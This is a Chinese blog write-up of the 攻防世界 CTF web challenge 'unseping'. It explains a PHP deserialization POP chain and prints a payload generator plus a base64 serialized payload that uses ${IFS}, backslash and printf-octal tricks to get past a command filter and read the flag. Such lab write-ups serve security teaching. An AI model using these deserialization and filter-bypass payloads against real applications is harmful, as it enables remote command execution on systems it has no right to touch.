攻防世界 unseping笔记

最新推荐文章于 2025-06-12 21:58:41 发布
最新推荐文章于 2025-06-12 21:58:41 发布
阅读量406 收藏 1
点赞数 14
分类专栏: 攻防世界 文章标签: 笔记 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_84140255/article/details/146040290
版权

代码审计

pop链

__wakeup()->waf()->__destruct()->ping()->exec()

让$method=ping,中间有call_user_func_array(array($this, $this->method), $this->args);

 

call_user_func_array(callable $callback, array $param_array): mixed 
 

🔹 参数
 

  1. $callback(必填):要调用的函数或方法,可以是: 
  
    • 字符串(函数名或类的静态方法 "ClassName::method"
    • 数组([$object, "method"]["ClassName", "method"]
    • 匿名函数(Closure)
     
  2. $param_array(必填):包含传递给函数的参数的数组。
 

所以$args必须是数组
 

if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
 

用${IFS}代替空格,字符串加\绕过,/用二进制编码$(printf${IFS}"\57")绕过
 

构造payload
 

<?php
class ease{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }

}
$a=new ease("ping",array('more${IFS}fl\ag_1s_here$(printf${IFS}"\57")f*'));
$b=base64_encode(serialize($a));
echo $b;
 

payload
 

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo0NToibW9yZSR7SUZTfWZsXGFnXzFzX2hlcmUkKHByaW50ZiR7SUZTfSJcNTciKWYqIjt9fQ==
 

 运行得到flag
 

 

 
 


                

        

    

  



    



                



	

		

			

				
					
2024年网络安全最新攻防世界Web题 - unseping 总结_unseping攻防世界

				
			

			

				

					2401_84302722的博客
				

				

					05-01
					
					462
					
				

			

		

		

			
				
【代码】2024年网络安全最新攻防世界Web题 - unseping 总结_unseping攻防世界

			
		

	



                

            
              



	

		

			

				
					
攻防世界题目练习——Web难度1(二)_&lt; php highlight_file(__file__); include(&quot;(1)

				
			

			

				

					2301_79054215的博客
				

				

					04-20
					
					1359
					
				

			

		

		

			
				
是Linux中的一个特殊变量,它代表了当前的字段分隔符,它的默认值是空格、制表符和换行符,当输入命令时,会以空格、制表符或换行符作为分隔符,将输入的内容分割成不同的字段,每个字段将作为命令的一个参数进行解析和执行。现在我们知道了waf函数过滤的有哪些字符或字符串,我们要避免直接输入这些关键词,但是有些字符在我们查找flag的过程中不可避免地会用到,因此我们对它们进行绕过,绕过的方式有如下几种。函数进行了匹配,第一个参数是给定的用来模式匹配的正则表达式,第二个参数是输入的要匹配的字符串。

			
		

	



              


  
              

                


	

		

			

				
					
php函数重载 和call_user_func和call_user_func_array详解

				
			

			

				

					云烟阁
				

				

					01-03
					
					2271
					
				

			

		

		

			
				
php函数call_user_func和call_user_func_array详解

call_user_func函数类似于一种特别的调用函数的方法,使用方法如下: 

function a($b,$c) 
{
echo $b;
echo $c;
}
call_user_func('a', "111","222");
call_user_func('a', "333","444");

			
		

	





	

		

			

				
					
PHP 中__Call()和call_user_func_array()方法的使用方法

				
			

			

				

					xiongmao000738
				

				

					02-22
					
					3085
					
				

			

		

		

			
				
转自:PHP5与MySQL5web开发技术详解


<?php
    class MyClass1
    {
    	private $obj;
    	
    	function __construct($obj)
    	{
    		$this->obj =$obj; 
    	}
    	function __call($Method, $Args)
    	{

			
		

	



		

			
		



	

		

			

				
					
php反序列化java_PHP反序列化漏洞简介及相关技巧小结

				
			

			

				

					weixin_36411269的博客
				

				

					02-25
					
					507
					
				

			

		

		

			
				
*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径要学习PHP反序列漏洞,先了解下PHP序列化和反序列化是什么东西。php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程中对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。php序列化的函数为serialize。反序列化的函数为unserialize。序列化举个栗子:...

			
		

	





	

		

			

				
					
攻防世界unseping_unseping攻防世界(1),零基础入门学习网络安全

				
			

			

				

					2301_79054215的博客
				

				

					04-20
					
					1103
					
				

			

		

		

			
				
7.call_user_func_array(X,Y):是一个调用的函数,有基本的两个参数,X是本对像中的将要被调用的函数,Y传入到这个函数里面的参数。看看反序列化对象中的method变量是否等于"ping",若等于就调用array($this, $this->method)这个函数,也就是ping()函数(因为这语句的的意思是当前类(this)中的ping()函数(对传来的参数进行解码,反序列化形成一个对象,触发__wakeup()函数,并将反序列化生成的对象的变量内容赋值给当前所在的类中的变量。

			
		

	





	

		

			

				
					
攻防世界 - Web - Level 1 | unseping

				
			

			

				

					Blue17 の 小窝
				

				

					12-09
					
					1993
					
				

			

		

		

			
				
IFS 是linux中的命令 $IFS默认指定space,tab,换行 也可以自己指定$IFS,例:IFS='&' $IFS可以把多个符号和并,如下: mm=11&&22&&33, echo $mm;中就是我们进行命令执行的参数,我们的目标是获取 Flag,但是目前我们连 Flag 的位置都不知道,所以首先我们肯定是要先检查目标当前文件夹下的文件有啥的,所以我们想要执行的命令为。PHP 官方文档中写名的,该函数第一个接收的是回调函数,第二个接收的是参数数组。传递的是一个数组类型的数据,为啥?

			
		

	





	

		

			

				
					
unseping攻防世界

				
			

			

				

					W286734的博客
				

				

					10-30
					
					1043
					
				

			

		

		

			
				
将每个字符转换为其二进制表示并格式化# 将每个字符转换为其八进制表示并格式化# ord(char)获取字符的ASCII值。# format(ord(char), '03o')将ASCII值转换为三位的八进制表示。# join()将生成的八进制字符串连接成一个以 \ 分隔的字符串。# 将每个字符转换为其十六进制表示并格式化print(f"二进制\

			
		

	





	

		

			

				
					
攻防世界unseping_unseping攻防世界,网络安全岗面试必问

				
			

			

				

					2301_79054215的博客
				

				

					04-20
					
					928
					
				

			

		

		

			
				
看看反序列化对象中的method变量是否等于"ping",若等于就调用array($this, $this->method)这个函数,也就是ping()函数(因为这语句的的意思是当前类(this)中的ping()函数(对传来的参数进行解码,反序列化形成一个对象,触发__wakeup()函数,并将反序列化生成的对象的变量内容赋值给当前所在的类中的变量。先赋值给当前类中的waf函数,看看是否满足waf函数过滤条件,若满足条件再赋值给这个数组$this->args,再通过。1.构造payload生成代码如下。

			
		

	





	

		

			

				
					
攻防世界unseping_unseping攻防世界(1),看完不会的来打我

				
			

			

				

					2401_84240369的博客
				

				

					04-11
					
					528
					
				

			

		

		

			
				
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。

			
		

	





	

		

			

				
					
初识反序列化

				
			

			

				

					wyjcxyyy的博客
				

				

					01-27
					
					676
					
				

			

		

		

			
				
前两天听了一位学长讲了序列化与反序列化基础,讲的巨好,也是收获颇丰。然后又做了一道相关题目,记录一下。

			
		

	





	

		

			

				
					
攻防世界 - Web - Level 1 unseping

				
			

			

				

					m0_74825541的博客
				

				

					12-26
					
					1048
					
				

			

		

		

			
				
中就是我们进行命令执行的参数,我们的目标是获取 Flag,但是目前我们连 Flag 的位置都不知道,所以首先我们肯定是要先检查目标当前文件夹下的文件有啥的,所以我们想要执行的命令为。本关是一个 PHP 代码审计关卡,考察的是 PHP 反序列化漏洞以及命令执行的一些绕过手段,下面笔者将带你一步步过关。PHP 官方文档中写名的,该函数第一个接收的是回调函数,第二个接收的是参数数组。如上,我们成功得到了 Flag 的存放地址,此时注意了页面显示的。结合上面两个函数,很明显,我们要生成一个对象,并给这个对象的。

			
		

	





	

		

			

				
					
JS红宝书笔记 10.11-10.16 函数

				
			

			

				

					qq_47804149的博客
				

				

					06-09
					
					798
					
				

			

		

		

			
				
读完JS红宝书10.11-10.16节后做的笔记,包括函数表达式、递归、尾调用优化、闭包、立即调用函数表达式、私有变量等内容

			
		

	





	

		

			

				
					
Vim 高亮命令完整学习笔记

				
			

			

				

					面朝大海
				

				

					06-10
					
					647
					
				

			

		

		

			
				
Vim 作为强大的文本编辑器,提供了丰富的搜索和高亮功能。掌握这些命令可以大大提高文本处理效率。本文将系统介绍 Vim 的高亮搜索命令和正则表达式的使用。

			
		

	





	

		

			

				
					
交叉编译笔记

				
			

			

				

					weixin_65589140的博客
				

				

					06-10
					
					795
					
				

			

		

		

			
				
不过幸运的是,主流开发板厂商(如友善之臂)通常会提供预编译好的工具链,只需按照官方手册配置,即可大幅降低入门门槛。32位编译器建议在32位系统中使用,虽可通过安装依赖在64位系统运行,但可能引发兼容性问题。,例如在x86架构的Linux主机上编译适用于ARM架构开发板的程序。官方文档永远是第一手资料,其次可参考优快云等技术社区(如Qt编译参数详解)。使用CMake配置Qt6源码,指定交叉编译器路径,生成构建文件后运行。64位编译器仅支持64位系统,需确保主机与工具链位数匹配。

			
		

	





	

		

			

				
					
PHP7内核剖析 学习笔记 第十章 扩展开发(1)

				
			

			

				

					tus00000的博客
				

				

					06-09
					
					692
					
				

			

		

		

			
				
php_ini_register_extensions()中将遍历php_extension_lists.engine和php_extension_lists.functions,然后分别调用php_load_zend_extension_cb、php_load_php_extension_cb完成Zend扩展、PHP扩展的加载。extname参数是扩展名;共享库形式需要将库名加入php.ini文件中,在php_module_startup()阶段会将php.ini中的对应的扩展共享库加载到PHP中。

			
		

	





	

		

			

				
					
【算法笔记】树套树

				
			

			

				

					fans2306的博客
				

				

					06-08
					
					1062
					
				

			

		

		

			
				
在面对二维区间统计问题查询某个一维区间中,大于某个值的数的个数对一个序列同时支持区间查询 + 单点修改我们常用的一维数据结构(如线段树、树状数组)往往显得力不从心。树套树。“树套树”顾名思义,就是一棵树中的每个节点再套一棵树。外层:线段树/树状数组,按照下标维护区间内层:平衡树(如 STLmultiset或手写)维护该区间内的值集合单点修改某个值查询区间中小于/大于某值的数的个数查询区间第kkk小数值(需平衡树)

			
		

	





	

		

			

				
					
【论文阅读笔记】高光反射实时渲染新突破:3D Gaussian Splatting with Deferred Reflection 技术解析

					
最新发布

				
			

			

				

					weixin_43357695的博客
				

				

					06-12
					
					531
					
				

			

		

		

			
				
本文提出了一种结合延迟着色与3D高斯溅射的镜面反射渲染新方法,解决了现有技术在高频辐射场拟合中的难题。该方案通过两个关键创新:1) 将反射强度与法线向量融入高斯溅射过程,构建屏幕空间贴图;2) 设计法线传播训练算法,使反射高斯的准确法线能渐进扩散至邻近区域。实验表明,该方法在合成与真实场景中均显著提升PSNR指标,镜面反射质量超越当前最优技术,同时保持实时渲染性能。研究还发现该方法能生成更精确的法线和环境贴图估计,为复杂反射效果建模提供了新思路。

			
		

	





	

		

			

				
					
攻防世界 unseping

				
			

			

				

					10-20
				

			

		

		

			
				
攻防世界Wire1杂项题目中的unseping是一个反序列化漏洞利用题目。在这个题目中,用户可以通过POST请求传递一个经过base64编码和序列化的数据,然后在服务器端进行反序列化操作。攻击者可以构造一个恶意的序列化数据...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值